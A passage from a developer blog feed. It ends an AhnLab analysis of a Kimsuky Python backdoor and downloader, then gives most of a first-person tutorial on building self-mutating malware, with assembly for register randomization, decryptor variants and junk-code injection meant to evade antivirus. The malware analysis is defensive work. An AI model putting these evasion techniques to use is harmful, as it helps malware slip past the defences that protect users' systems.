src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F907u7xyfqxmd45nb2cq3.png" alt="Table 5" width="800" height="226"></a></p> <p><em>[Table 5] Additional File Downloads</em></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhpclecvqe35y3hfz6928.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhpclecvqe35y3hfz6928.png" alt="Figure 6" width="800" height="433"></a></p> <p><em>[Figure 6] Partial Code from hh.bat</em></p> <p>The final Python backdoor is executed through the XML scheduled task. The <code>hh.bat</code> registers a new task named <strong>GoogleExtension{02-2032121-098}</strong> to run <code>C:\winii\beauty.py</code>.</p> <h2> 3. Python Malware </h2> <p>Two types of Python-based malicious code were identified: a downloader that fetches additional payloads from an external server, and a backdoor that remotely executes attacker commands.</p> <h3> 3-1. Backdoor </h3> <p>The backdoor sends a packet containing the string “<strong>HAPPY</strong>” to the C2 server at <code>45.95.186[.]232:8080</code> to signal successful infection. It then communicates using a custom protocol with fixed 4096-byte packets starting with magic bytes <code>0x99 0x0A 0xBD 0x99</code>. Depending on the command code, it performs the following functions:</p> <ul> <li>Shell command execution</li> <li>Drive list enumeration</li> <li>File upload and download</li> <li>File deletion (with random data overwrite before deletion) and execution (.exe, .bat, .vbs)</li> </ul> <p>During analysis, actions such as collecting drive information, network configuration (via ipconfig), and running processes (via tasklist) were observed.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxar30ubnsoyjwmh6j828.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxar30ubnsoyjwmh6j828.png" alt="Figure 7" width="602" height="642"></a></p> <p><em>[Figure 7] Function Branching Based on Attacker Commands</em></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhz14s47eo82uj20nho59.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhz14s47eo82uj20nho59.png" alt="Table 6" width="800" height="457"></a></p> <p><em>[Table 6] Functions by Command</em></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Furpkvff0oqq19p29as62.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Furpkvff0oqq19p29as62.png" alt="Table 7" width="800" height="557"></a></p> <p><em>[Table 7] Commands Sent by Attacker</em></p> <h3> 3-2. Downloader </h3> <p>The downloader connects to the attacker-controlled server, saves VBS and BAT files to the <code>%TEMP%</code> path, and executes them in the background using the <code>CREATE_NO_WINDOW (0x08000000)</code> flag without showing a console window. After 180 seconds, it deletes both files to erase traces.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fh03kcijq9u9ozovn65w2.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fh03kcijq9u9ozovn65w2.png" alt="Figure 8" width="602" height="715"></a></p> <p><em>[Figure 8] Partial Python Downloader Code</em></p> <h2> 4. Kimsuky Group Characteristics </h2> <h3> 4-1. XML-Based Scheduled Task Registration </h3> <p>The task names used in this backdoor campaign are similar to those previously used by Kimsuky when distributing RAT malware.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0rd0aitaq1lgqap4yw5u.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0rd0aitaq1lgqap4yw5u.png" alt="Table 8" width="800" height="389"></a></p> <p><em>[Table 8] Similarity in Scheduled Task Names</em></p> <h3> 4-2. Similar XML Filenames </h3> <p>Kimsuky has historically used XML files in the <code>sch_*.db</code> format for scheduled task registration.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4sbf4mbxjtr652715rfm.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4sbf4mbxjtr652715rfm.png" alt="Table 9" width="800" height="211"></a></p> <p><em>[Table 9] Similarity in XML Filenames</em></p> <h3> 4-3. Reuse of Previously Used Decoy Files </h3> <p>Decoy files used in past Kimsuky campaigns are being reused in these new LNK attacks.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgk8fsrlmm7mj31vhhlxl.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgk8fsrlmm7mj31vhhlxl.png" alt="Figure 9" width="800" height="527"></a></p> <p><em>[Figure 9] Legitimate Decoy File Used in Previous Kimsuky Campaigns</em></p> <h2> 5. Conclusion </h2> <p>In this campaign, Kimsuky maintained a similar overall attack flow while introducing structural changes in the intermediate execution stages. The abuse of legitimate cloud services like Dropbox for both data exfiltration and file download, along with the use of Python to bypass detection, are notable features. These changes demonstrate the group’s tactic of keeping the broad attack framework intact while continuously modifying implementation details to evade detection.</p> <p>LNK files disguised as document files are extremely difficult to identify as malicious based on appearance alone. Therefore, users should always be cautious with files from unknown sources and never execute them recklessly.</p> <p><strong>Source: AhnLab</strong></p> malware vulnerabilities redteam cybersecurity The Art of Self-Mutating Malware Excalibra Sat, 11 Apr 2026 10:09:15 +0000 https://dev.to/excalibra/the-art-of-self-mutating-malware-36ab https://dev.to/excalibra/the-art-of-self-mutating-malware-36ab <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbd2nrc3ffj6igs90wvbf.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbd2nrc3ffj6igs90wvbf.png" alt=" " width="800" height="340"></a></p> <p><strong>Article Summary</strong>: This article systematically elaborates on the technical evolution and implementation principles of self-mutating malware, covering the core mechanisms of polymorphic and metamorphic engines. Through two concrete examples — Veil64 and Morpheus — the author "f00crew" from Hong Kong China, analyzes key techniques such as register randomization, algorithmic variants, and intelligent junk code injection. It emphasizes how mutation at the syntactic, structural, and semantic layers can evade signature-based detection while strictly adhering to the principle of behavioral conservation. The author points out that the essence of mutation technology is to keep functionality unchanged while infinitely varying the implementation method, and warns of risks such as code size inflation and stability issues.</p> <p><strong>Categories</strong>: Malware, Binary Security, Vulnerability Analysis, Red Teaming, Penetration Testing</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe31vsj5wynprxmqy68y6.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe31vsj5wynprxmqy68y6.png" alt=" " width="800" height="340"></a></p> <p><strong>The Art of Self-Mutating Malware</strong></p> <p>In the beginning, detection relied on signatures — a simple byte string that could uniquely identify a malicious sample. In that era, the process was straightforward: append the virus to the end of a file and patch the entry point. The AV industry quickly responded with signature databases, and for a period, the rhythm of this confrontation was predictable.</p> <p>This article discusses how to implement self-mutating malicious code: how to build your own polymorphic engine, and some core ideas behind metamorphic code. For malicious code, self-mutation is one of the most elegant paths to solving the detection problem. You no longer just hide yourself — you become “another you” with every replication. This is the purest form of digital evolution.</p> <p>The concepts we discuss do not depend on any specific implementation. Although the article uses real examples and practical principles from code I have written, the real value lies in understanding the underlying theory of “why mutation is feasible.”</p> <p>Let’s go back to the beginning. Early VX practices were crude: they directly overwrote files and caused destruction. Some samples would first run the original program and then deliver their own payload. AV quickly caught up, mainly relying on signature scanning to catch samples.</p> <p>The VX community evolved accordingly and began encrypting their code. The payload remained encrypted and was only unpacked at runtime. AV then turned its attention to the decryptor, so VX authors began dynamically transforming decryption routines. Some families even automatically rotated decryptors — this type later became known as <strong>oligomorphic</strong>.</p> <p>Around 1985 to 1990, AV dominated with static signature scanning: string matching and fixed byte patterns made samples easy to hit once they landed on disk. By the early 1990s, the situation began to change. Virus bodies started to be encrypted, exposing only a decryption stub. This stub immediately became AV’s primary hunting target and spurred the development of wildcard and heuristic scanning.</p> <p>Then <strong>polymorphic</strong> viruses appeared. The virus would automatically generate a new decryptor at creation time or during each infection. Each instance had its own encryption/decryption routine and evaded scanning by rearranging machine code. This was the typical feature from 1995 to 2000: the same virus, infinite appearances. Dark Avenger’s MtE engine completely rewrote the rules of this game.</p> <p>After that, <strong>metamorphic</strong> viruses emerged. They no longer relied on an encryption shell. They would rewrite the entire body with every infection. Code structure, control flow, and register usage would all change, but the payload remained unchanged. Between 2000 and 2005, metamorphic samples like Zmist and Simile raised the bar even higher: there was no fixed decryptor to track — only continuous code mutation.</p> <p>Metamorphic code changes <strong>everything</strong>, not just the decryptor. It evolved from polymorphism but upgraded from “encryption camouflage” to “overall code reshaping.” Detection difficulty is extremely high; implementation difficulty is equally high, especially at the assembly level.</p> <h3> Overview </h3> <p>When it comes to self-modifying loaders, you have two paths. The first is to keep it small and aggressive: build a lightweight, fast loader that only performs “just enough” mutation — tweak a few places here, quickly shuffle a few there — to slip past scanners without triggering obvious alerts. The code remains compact and raw, but reliable enough.</p> <p>The other path is full metamorphosis. The loader no longer just fine-tunes itself; it disassembles and rebuilds itself. Layouts are rearranged, instructions are scattered, and entirely new encryption is used on every run. Even if reverse engineers and AV capture one version, the next version will look like a completely unfamiliar sample.</p> <p>This is not magic. Making it run stably after every mutation is extremely difficult. You must build in validation: count instructions, verify jumps, and perform sanity checks on every change — otherwise it will crash immediately. Even more troublesome is that code size can balloon out of control, eventually losing practicality.</p> <p>Before discussing specific techniques, we must first clarify: when we talk about executable code, what does “mutation” really mean? It is not just “changing a few bytes,” but the relationship between “form and function,” and how far this relationship can be stretched without destroying behavior.</p> <h3> — The Essence of Identity — </h3> <p>What exactly makes a program “itself”? Is it the order of instructions? Register usage? Memory layout? Or something deeper, like intent?</p> <p>Mutation’s answer is: identity does not lie in what the code <strong>looks like</strong>, but in what the code <strong>does</strong>. As long as two binaries produce the same output for the same input, they are functionally equivalent — even if their assembly is completely different.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight nasm"><code><span class="nf">Version</span> <span class="nv">A</span><span class="p">:</span> <span class="nv">Version</span> <span class="nv">B</span><span class="p">:</span> <span class="nv">Version</span> <span class="nv">C</span><span class="p">:</span> <span class="nf">mov</span> <span class="nb">eax</span><span class="p">,</span> <span class="mi">0</span> <span class="nv">xor</span> <span class="nb">eax</span><span class="p">,</span> <span class="nb">eax</span> <span class="nv">sub</span> <span class="nb">eax</span><span class="p">,</span> <span class="nb">eax</span> <span class="nf">inc</span> <span class="nb">ebx</span> <span class="nv">add</span> <span class="nb">ebx</span><span class="p">,</span> <span class="mi">1</span> <span class="nv">lea</span> <span class="nb">ebx</span><span class="p">,</span> <span class="p">[</span><span class="nb">ebx</span><span class="o">+</span><span class="mi">1</span><span class="p">]</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Bytes: Bytes: Bytes: B8 00 00 00 00 43 31 C0 83 C3 01 29 C0 8D 5B 01 </code></pre> </div> <p>Three completely different byte patterns that produce identical behavior. This was my “eureka moment” and the starting point for all subsequent implementations.</p> <p>The core insight is: a program’s identity is not its bytes, but its behavior. If I can generate infinitely many patterns that keep behavior unchanged while making bytes different, signature-based detection will be continuously undermined.</p> <p>But this also raises harder questions:</p> <ul> <li>How to systematically generate equivalent code?</li> <li>How to guarantee correctness across mutations?</li> <li>How to make variants truly unpredictable?</li> </ul> <p>These three questions directly shaped the design of my two engines. They explore different paths to “mutation,” and we call them <strong>Veil64</strong> and <strong>Morpheus</strong>.</p> <p>Veil64 is a polymorphic code generator used to produce infinite variants of decryption routines: same functionality, infinite forms. Morpheus is a file infector that truly rewrites its own code during execution.</p> <p>This is the core idea. Everything else is built on top of it: if you cannot hide <em>what</em> is done, then make <em>how</em> it is done unpredictable.</p> <p>Signatures are the byte patterns that AV focuses on tracking — the “high-risk” digital footprints. Strings, code fragments, hashes — anything that can mark malware will be used. Encryption is a key technique here: it scrambles these recognizable markers, making it difficult for AV to hit them.</p> <p>Then there is the <strong>payload</strong>, the part that actually executes the malicious logic. It usually does not run alone but is bound to a stub. This small module decrypts and launches the payload in memory. Because the payload itself is encrypted, AV has difficulty hitting it statically and instead targets the stub. The advantage is that the stub is small and easy to continuously mutate, allowing it to constantly bypass old rules.</p> <p>This turns the confrontation into a “one-to-many” game, and this mathematical relationship naturally favors the mutation side. Each new variant has a chance to break old detection rules, burn old signatures, and continue to lurk.</p> <blockquote> <p>“What starts as polymorphic finishes as metamorphic.”</p> </blockquote> <h3> — Levels of Mutation — </h3> <p>Mutation is not just surface-level change — it occurs across layers, including syntactic, structural, and semantic reconstruction.</p> <p>First, <strong>syntactic mutation</strong> (grammar-level mutation). This is the outermost layer: replacing equivalent instructions, randomizing register usage, and reordering operations. Appearance changes, result remains the same.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight nasm"><code><span class="nl">Original:</span> <span class="nf">mov</span> <span class="nb">eax</span><span class="p">,</span> <span class="p">[</span><span class="nb">ebx</span><span class="o">+</span><span class="mi">4</span><span class="p">]</span> <span class="nl">Mutated:</span> <span class="nf">push</span> <span class="nb">ebx</span> <span class="nf">add</span> <span class="nb">ebx</span><span class="p">,</span> <span class="mi">4</span> <span class="nf">mov</span> <span class="nb">eax</span><span class="p">,</span> <span class="p">[</span><span class="nb">ebx</span><span class="p">]</span> <span class="nf">sub</span> <span class="nb">ebx</span><span class="p">,</span> <span class="mi">4</span> <span class="nf">pop</span> <span class="nb">ebx</span> </code></pre> </div> <p>Both snippets load the value at <code>[ebx+4]</code> into <code>eax</code>, but the instruction paths are completely different.</p> <p>Deeper is <strong>structural mutation</strong> (structure-level mutation). The change is more profound: reconnecting control flow, rewriting data structures, or even replacing entire algorithms with “different paths but equivalent results.”</p> <p>The deepest is <strong>semantic mutation</strong> (semantic-level mutation). It splits functions and reorganizes logic into behaviorally equivalent bodies while ensuring the original intent remains unchanged.</p> <h3> — The Conservation Principle — </h3> <p>No matter how aggressive the mutation, there is one non-negotiable constraint: the program’s semantic behavior must be preserved. <em>What</em> is done (functional output) must remain unchanged; only <em>how</em> it is done (internal implementation mechanism) can change.</p> <p>The genotype (underlying code structure) can freely drift, mutate, and be obfuscated; the phenotype (externally observable behavior) must remain constant. All mutation techniques can only operate within this boundary.</p> <h3> Naive Approaches </h3> <p>Polymorphism is the purest form of mutation. It essentially expresses the same thing in a thousand different ways. Like a chameleon with a clear goal: core behavior is locked, while everything else continuously changes. No fixed identity, only endless variants.</p> <p>My first serious attempt to break signature detection was <strong>Veil64</strong>: a polymorphic code generator capable of generating infinite different ways to write the same decryption logic. The goal was simple: encrypt the payload differently every time and ensure the decryptor never appears the same twice.</p> <h3> — Core Challenges — </h3> <p>Constructing code that can correctly decrypt every time but looks different each time is non-trivial. Every generation must be compact, fast, clean, highly efficient, without leaving obvious patterns, and resistant to both static and dynamic analysis.</p> <p>I started with a simple two-stage design, and understanding this split is key to why it works. The first layer is the <strong>stub</strong>: a minimal piece of code responsible for memory allocation and decrypting the embedded engine. The second layer is the <strong>engine</strong> itself: the polymorphic decryptor that actually handles the payload.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>┌─────────────────┐ │ Stub Code │ (119-200 bytes) ├─────────────────┤ │ Encrypted Engine│ (176-300 bytes) ├─────────────────┤ │ Padding │ └─────────────────┘ </code></pre> </div> <p>Why use two stages? Because this allows the polymorphic engine itself to be encrypted. The stub is small and simple, so even with variants, the signature surface is limited. The real polymorphic power resides in the engine. By encrypting the engine and embedding it inside the stub, complex and variable code is hidden until runtime.</p> <p>The overall flow is as follows: you call <code>genrat()</code> with a buffer, size, and seed key. The engine first generates a runtime key using multiple entropy sources: RDTSC provides hardware timing, stack pointer provides process differences, and RIP provides position-related randomness. It then builds the polymorphic engine, including random register allocation, selection among four algorithmic variants, and intelligent junk code injection.</p> <p>Next comes the stub generation stage. Multiple <code>mmap</code> syscall initialization variants are generated, RIP-relative addressing is handled for position independence, and the encrypted engine is embedded. Finally, everything is encrypted and assembled into executable code.</p> <p>The clever part is that the stub and engine change independently. Even if someone creates a signature for a stub variant, the internal encrypted engine is different every time. Even if they manage to extract and analyze the engine, the next generation will use a completely different set of registers and algorithms.</p> <h3> — The Four Pillars of Polymorphism — </h3> <p><strong>Never use the same set of registers twice.</strong></p> <p>Hard-coded registers are signature bait. If your decryptor always uses EAX as a counter and EBX as a data pointer, you are practically exposing yourself. Such patterns will be quickly flagged, so the engine randomizes register usage on every generation.</p> <p>But this is not random grabbing. The selection process avoids conflicts, skips RSP to prevent stack corruption, and ensures no register takes on multiple roles. The underlying logic looks roughly like this:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight nasm"><code><span class="nl">get_rr:</span> <span class="nf">call</span> <span class="nv">next_random</span> <span class="nf">and</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">7</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="nv">REG_RSP</span> <span class="c1">; Never use stack pointer</span> <span class="nf">je</span> <span class="nv">get_rr</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="nv">REG_RAX</span> <span class="c1">; Avoid RAX conflicts</span> <span class="nf">je</span> <span class="nv">get_rr</span> <span class="nf">mov</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">reg_base</span><span class="p">],</span> <span class="nb">al</span> <span class="c1">; Store base register</span> <span class="nl">.retry_count:</span> <span class="nf">call</span> <span class="nv">next_random</span> <span class="nf">and</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">7</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="nv">REG_RSP</span> <span class="nf">je</span> <span class="nv">.retry_count</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">reg_base</span><span class="p">]</span> <span class="c1">; Ensure no conflicts</span> <span class="nf">je</span> <span class="nv">.retry_count</span> <span class="nf">mov</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">reg_count</span><span class="p">],</span> <span class="nb">al</span> </code></pre> </div> <p>This process is repeated for key registers and all registers used in junk code. Even before considering algorithms and junk injection, there are already 210 possible register combinations. That means the same register-level operation can have 210 different appearances — all completely distinct to a signature scanner.</p> <p>One variant might use RBX for data, RCX for counting, and RDX for the key. The next might switch to RSI for data, RDI for counting, and RBX for the key. Yet another could use extended registers R8, R9, R10. Every combination is functionally equivalent, but the opcode patterns are completely different.</p> <h3> — Four Ways to Say the Same Thing — </h3> <p>Register randomization is only the starting point. True depth comes from algorithmic polymorphism. We do not fix a single decryption flow but cycle between four equivalent algorithms: same output, completely different instruction streams.</p> <p>This is not simply swapping XOR for ADD. Each variant is carefully designed to guarantee correctness while maximizing signature dispersion.</p> <ul> <li>Algorithm 0: ADD → ROL → XOR </li> <li>Algorithm 1: XOR → ROL → XOR </li> <li>Algorithm 2: SUB → ROR → XOR </li> <li>Algorithm 3: XOR → ADD → XOR </li> </ul> <p>All four algorithms produce identical final results, but their instruction sequences and opcode patterns are entirely different.</p> <p>Each algorithm has a corresponding inverse process in the encryption phase. For example, if encryption uses XOR → ROR → SUB, decryption uses ADD → ROL → XOR. Mathematically they cancel perfectly, but the instruction flows never look the same. Opcode patterns, instruction lengths, and register usage all change. To a signature scanner, they appear as completely different routines.</p> <h3> — Intelligent Junk Code — </h3> <p>Most polymorphic engines fail here: they either stuff random bytes or pile on obvious NOP sleds, practically shouting “I’m malware.” That is low-level. True polymorphism uses “intentional-looking” junk code that blends into the context and mimics normal compiler output.</p> <p>Junk injection is not purely random — it is structured. It uses no-net-effect PUSH/POP pairs that look like register preservation, XOR reg, reg to imitate common zeroing initialization, and MOV reg, reg that resembles typical compiler register shuffling.</p> <p>This is just a very basic example. Some engines do it more aggressively. The key point is to make it look like real developer code. PUSH RAX followed by POP RBX can masquerade as register saving and transfer; XOR RAX, RAX looks like legitimate initialization; MOV RAX, RAX resembles dead code left by an optimizer. Functionally they add no value, but visually they blend in.</p> <p>Junk injection also deliberately varies in density: sometimes heavy, sometimes sparse; sometimes clumped, sometimes scattered in loops. There is no fixed “junk zone” that can be isolated — only code that looks normal every single time.</p> <h3> — Breaking Linear Analysis — </h3> <p>Static analysis relies on linear flow: traversing code, building graphs, and extracting patterns. So we break it. Random jumps are inserted to skip over junk regions, directly destroying straight-line logic.</p> <p>Jump generation is subtle. Sometimes 2-byte short jumps, sometimes 5-byte long jumps; they may skip only 1 byte or over a dozen. The skipped junk content is randomized every time. Even if the analyzer follows the jump path, its rhythm is disrupted on every run.</p> <p>This produces unpredictable control flow and interferes with both static and dynamic analysis. Static tools face non-linear instruction streams mixed with random data; dynamic tools encounter different execution paths on every run, making it difficult to build a stable behavioral profile.</p> <p>These jumps also serve a dual purpose: they mimic compiler output. Real compiled code is full of branches, jumps, and irregular flow. Injecting our own jumps increases this “natural complexity,” helping the code blend more seamlessly.</p> <h3> — The Entropy Problem — </h3> <p>Hard-coded keys or constants are traps. I learned this the hard way: early versions embedded the constant 0xDEADBEEF in every variant. No matter how much the rest of the code changed, that fixed value instantly became a red flag.</p> <p>The solution is runtime key generation: no fixed constants, no repetition, no nail-down patterns. The key is reconstructed on every execution, drawing from multiple entropy sources that vary with execution round, process, and machine.</p> <p>Entropy comes from multiple sources. RDTSC provides high-resolution microsecond-level timing; the stack pointer changes with processes and function calls; RIP brings position-related randomness under ASLR; the user key introduces input-driven variation.</p> <p>The real strength lies in how these values are combined. It is not simple XOR, but involves rotations, complements, and mixing with stack-related values. Each transformation step depends on the current state, forming a dependency chain that ultimately produces a truly unpredictable key.</p> <h3> — Randomness Is Critical — </h3> <p>Excellent polymorphic capability depends on high-quality randomness. Many engines use basic linear congruential generators or simple incrementing counters — both easily produce predictable patterns that can be flagged. I prefer the XorShift PRNG: fast, long period (2^64−1), and passes strong statistical randomness tests without repeating for a very long time.</p> <p>Under ASLR, code is loaded at different addresses each time. Hard-coded absolute addresses will cause the polymorphic decryptor to fail if it lands in an unexpected location. The solution is RIP-relative addressing, with offsets calculated based on the current instruction pointer.</p> <h3> — Just-in-Time Machine Code Generation — </h3> <p>This is where we reach the real core. You cannot simply rearrange pre-written assembly and call it polymorphic. The engine generates raw x64 machine code on the fly, building every instruction byte by byte. Opcodes and operands are computed dynamically based on the current register allocation and algorithm choice.</p> <p>The ModRM byte is especially critical in x64: it encodes which registers are used. By calculating this byte dynamically, the engine can implement the same operation with any register combination, producing different bytes — and therefore different signatures.</p> <p>The same polymorphic thinking applies to all syscall parameters. Multiple construction methods are used to avoid pattern matching.</p> <h3> — Performance and Scalability — </h3> <p>Basic generation averages 9 to 13 milliseconds per variant, translating to 50,000 to 75,000 variants per minute — enough to overwhelm signature detection. Speed is not higher because each variant undergoes register renaming, flow randomization, intelligent junk injection, and anti-debug checks.</p> <p>Generation time fluctuates by ±3 to 4 ms by design to avoid predictability; stable timing would aid detection. The engine maintains this jitter by varying instruction order, junk block size, and encryption rounds.</p> <p>Static memory footprint is approximately 340 to 348 KB — far larger than toy 4 KB engines. This includes precomputed transformation tables, runtime mutation logic, and anti-emulation traps. Per-variant memory usage remains stable with no leaks or growth.</p> <p>Code size fluctuates between 180 bytes and 1.2 KB. Compact variants favor speed; balanced variants strike a compromise; complex variants maximize complexity to stress AV engines.</p> <h3> — What Variants Look Like — </h3> <div class="highlight js-code-highlight"> <pre class="highlight nasm"><code><span class="nf">Variant</span> <span class="err">#</span><span class="mi">1</span><span class="p">:</span> <span class="nb">Si</span><span class="nv">ze</span> <span class="mi">335</span><span class="p">,</span> <span class="nv">Key</span> <span class="mh">0x4A4BDC5C3AEAC0AD</span> <span class="err">48</span> <span class="nf">C7</span> <span class="nv">C0</span> <span class="mi">0</span><span class="nv">A</span> <span class="mi">00</span> <span class="mi">00</span> <span class="mi">00</span> <span class="nv">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">10</span> <span class="err">48</span> <span class="nf">FF</span> <span class="nv">C8</span> <span class="nv">dec</span> <span class="nb">rax</span> <span class="err">50</span> <span class="nf">push</span> <span class="nb">rax</span> <span class="err">58</span> <span class="nf">pop</span> <span class="nb">rax</span> <span class="err">90</span> <span class="nf">nop</span> <span class="err">48</span> <span class="err">31</span> <span class="nf">FF</span> <span class="nv">xor</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nb">rdi</span> <span class="nf">...</span> <span class="nf">Variant</span> <span class="err">#</span><span class="mi">2</span><span class="p">:</span> <span class="nb">Si</span><span class="nv">ze</span> <span class="mi">368</span><span class="p">,</span> <span class="nv">Key</span> <span class="mh">0x6BAAA583D73FA32B</span> <span class="err">50</span> <span class="nf">push</span> <span class="nb">rax</span> <span class="err">58</span> <span class="nf">pop</span> <span class="nb">rax</span> <span class="err">50</span> <span class="nf">push</span> <span class="nb">rax</span> <span class="err">58</span> <span class="nf">pop</span> <span class="nb">rax</span> <span class="err">48</span> <span class="err">31</span> <span class="nf">C0</span> <span class="nv">xor</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span> <span class="err">48</span> <span class="err">83</span> <span class="nf">C0</span> <span class="mi">09</span> <span class="nv">add</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">9</span> <span class="nf">...</span> <span class="nf">Variant</span> <span class="err">#</span><span class="mi">3</span><span class="p">:</span> <span class="nb">Si</span><span class="nv">ze</span> <span class="mi">385</span><span class="p">,</span> <span class="nv">Key</span> <span class="mh">0x5C3F1EDF85C0D55E</span> <span class="err">90</span> <span class="nf">nop</span> <span class="err">90</span> <span class="nf">nop</span> <span class="err">50</span> <span class="nf">push</span> <span class="nb">rax</span> <span class="err">58</span> <span class="nf">pop</span> <span class="nb">rax</span> <span class="err">48</span> <span class="nf">C7</span> <span class="nv">C0</span> <span class="mi">09</span> <span class="mi">00</span> <span class="mi">00</span> <span class="mi">00</span> <span class="nv">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">9</span> <span class="nf">...</span> </code></pre> </div> <p>Look at the differences. Variant #1 sets RAX by loading 10 then decrementing. Variant #2 uses PUSH/POP junk first, then XOR/ADD. Variant #3 starts with NOPs, inserts another set of junk, then loads directly. The result is the same (RAX = 9), but the method is completely different.</p> <p>Size fluctuation is large. These three samples differ by less than 50 bytes. In reality, the engine can produce variants from compact 180-byte versions to large 1200-byte versions, depending on the intensity of junk injection and obfuscation.</p> <p>The engine classifies variants into three categories by structure and complexity. Compact types (≈295–350 bytes) minimize junk and prioritize speed; balanced types (up to 400 bytes) compromise between obfuscation and stability; complex types (up to 500 bytes) layer more polymorphic techniques and anti-analysis features.</p> <p>With four algorithms combined with 210 register permutations, there are already 840 base variants before adding junk and control-flow obfuscation. Introducing variable junk injection, diverse jump patterns, and multiple stub initialization methods expands the variant space into the millions.</p> <p>The key is not just quantity, but “functional equivalence + signature diversity.” Every variant can correctly decrypt the payload, yet appears 